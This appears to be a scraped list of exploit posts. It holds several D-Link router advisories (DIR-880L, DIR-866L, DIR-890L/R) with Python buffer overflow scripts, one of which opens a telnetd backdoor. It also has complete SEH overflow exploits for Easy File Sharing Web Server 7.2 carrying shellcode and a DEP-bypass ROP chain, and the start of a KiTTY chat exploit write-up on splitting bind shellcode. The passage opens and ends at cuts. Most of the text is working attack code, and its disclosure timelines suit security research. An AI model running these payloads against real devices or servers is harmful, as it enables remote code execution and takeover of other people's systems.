protected]%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  8. Hacking

    ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  9. Hacking

    ## Advisory Information Title: DIR-866L Buffer overflows in HNAP and send email functionalities Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF. ## Details HNAP buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Observe this in a emulator/debugger or real device/debugger buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address buf+="\x2A\xBF\xB9\xF4" #s1 useless buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address buf+="DDDD" #s3 buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2 buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n" # Bad chars \x00 - \x20 # sleep address 2ac14c30 print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Observe this in a emulator/debugger or real device/debugger buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" buf+="1111" #s0 Loaded argument in S0 which is loaded in a0 buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30 buf+="XXXX" buf+="FFFF" # s3 buf+="XXXX" buf+="BBBB" # s5 buf+="CCCC" # s6 buf+="DDDD" # s7 buf+="DDDD" # extra pad buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1 buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="XXXX" # buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  10. ## Advisory Information Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities. Date published: July,17th, 2015 Vendors contacted: William Brown <[email protected]>, Patrick Cline [email protected](Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
  11. #!/usr/bin/env python # # Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP) # Date: 29/11/2015 # Exploit Author: Knaps # Contact: @TheKnapsy # Website: http://blog.knapsy.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 7 x64, but should work on any other Windows platform # # Notes: # - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/) # - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :) # - bad chars: '\x00' and '\x3b' # - max shellcode size allowed: 1260 bytes # import sys, socket, struct # ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy) # Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP. def create_rop_chain(): rop_gadgets = [ # Generate value of 201 in EAX 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFF, # Value of '-201' 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] # Put EAX into EBX (other unneccessary stuff comes with this gadget as well...) 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] # Carry on with the ROP as generated by mona.py 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location # used solely by the remaining part of the above gadget (it doesn't really do anything for us) 0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] # And carry on further as generated by mona.py 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x10013ad6, # POP EBP # RETN [ImageLoad.dll] 0x61c227fa, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] # Now bunch of ugly increments... unfortunately couldn't find anything nicer :( 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001b4f6, # POP ECX # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] 0x100194b3, # POP EDI # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Check command line args if len(sys.argv) <= 1: print "Usage: python poc.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # Offsets rop_offset = 2455 max_size = 5000 seh_offset = 4059 eax_offset = 4183 # move ESP out of the way so the shellcode doesn't corrupt itself during execution # metasm > add esp,-1500 shellcode = "\x81\xc4\x24\xfa\xff\xff" # Just as a PoC, spawn calc.exe. Replace with any other shellcode you want # (maximum size of shellcode allowed: 1260 bytes) # # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python # Payload size: 220 bytes shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31" shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5" shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96" shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1" shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde" shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68" shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5" shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f" shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9" shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96" shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28" shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40" shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a" shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed" shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce" shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3" shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85" buffer = "A" * rop_offset # padding buffer += create_rop_chain() buffer += shellcode buffer += "A" * (seh_offset - len(buffer)) # padding buffer += "BBBB" # overwrite nSEH pointer buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception buffer += "A" * (max_size - len(buffer)) # padding httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  12. # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 12/2/2015 # Exploit Author: ArminCyber # Contact: [email protected] # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Junk buff = "A"*4061 # Next SEH buff+= "\xeb\x0A\x90\x90" # pop pop ret buff+= "\x98\x97\x01\x10" buff+= "\x90"*19 # calc.exe # Bad Characters: \x20 \x2f \x5c shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" "\x1c\x39\xbd" ) buff+= shellcode buff+= "\x90"*7 buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) # HEAD a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
  13. # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow # Date: 12/2/2015 # Exploit Author: ArminCyber # Contact: [email protected] # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Junk buff = "A"*4061 # Next SEH buff+= "\xeb\x0A\x90\x90" # pop pop ret buff+= "\x98\x97\x01\x10" buff+= "\x90"*19 # calc.exe # Bad Characters: \x20 \x2f \x5c shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" "\x1c\x39\xbd" ) buff+= shellcode buff+= "\x90"*7 buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) # GET a.send("GET " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
  14. # Exploit Title: KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10) # Date: 28/12/2015 # Exploit Author: Guillaume Kaddouch # Twitter: @gkweb76 # Blog: http://networkfilter.blogspot.com # GitHub: https://github.com/gkweb76/exploits # Vendor Homepage: http://www.9bis.net/kitty/ # Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe # Version: 0.65.0.2p # Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 10 Pro x64 builds 10240/10586 (FR) # CVE: CVE-2015-7874 # Category: Remote """ Disclosure Timeline: -------------------- 2015-09-13: Vulnerability discovered 2015-09-26: Vendor contacted 2015-09-28: Vendor answer 2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability 2015-12-28: exploit published Other KiTTY versions have been released since 0.65.0.3p, not related to this vulnerability. Vendor said he may release a version without chat in a future release, while providing an external chat DLL as a separate download. Description : ------------- A remote overflow exists in the KiTTY Chat feature, which enables a remote attacker to execute code on the vulnerable system with the rights of the current user, from Windows XP x86 to Windows 10 x64 included (builds 10240/10586). Chat feature is not enabled by default. WinXP -> Remote Code Execution Win7 -> Remote Code Execution Win10 -> Remote Code Execution Instructions: ------------- - Enable Chat feature in KiTTY portable (add "Chat=1" in kitty.ini) - Start KiTTY on 127.0.0.1 port 1987 (Telnet) - Run exploit from remote machine (Kali Linux is fine) Exploitation: ------------- When sending a long string to the KiTTY chat server as nickname, a crash occurs. The EIP overwrite does let little room for exploitation (offset 54) with no more than 160 to 196 bytes for the shellcode from XP to Windows10. Using a Metasploit small shellcode such as windows/shell/reverse_ord_tcp (118 bytes encoded) makes KiTTY crashing after the first connection. We control the SEH overflow, but as all DLLs are SafeSEH protected, using an address from KiTTY itself has a NULL which forces us to jump backward with no extra space. We are jailed in a tight environment with little room to work with. The trick here is to slice our wanted Metasploit bind shellcode in 3 parts (350 bytes total), and send them in 3 successive buffers, each of them waiting in an infinite loop to not crash the process. Each buffer payload will copy its shellcode slice to a stable memory location which has 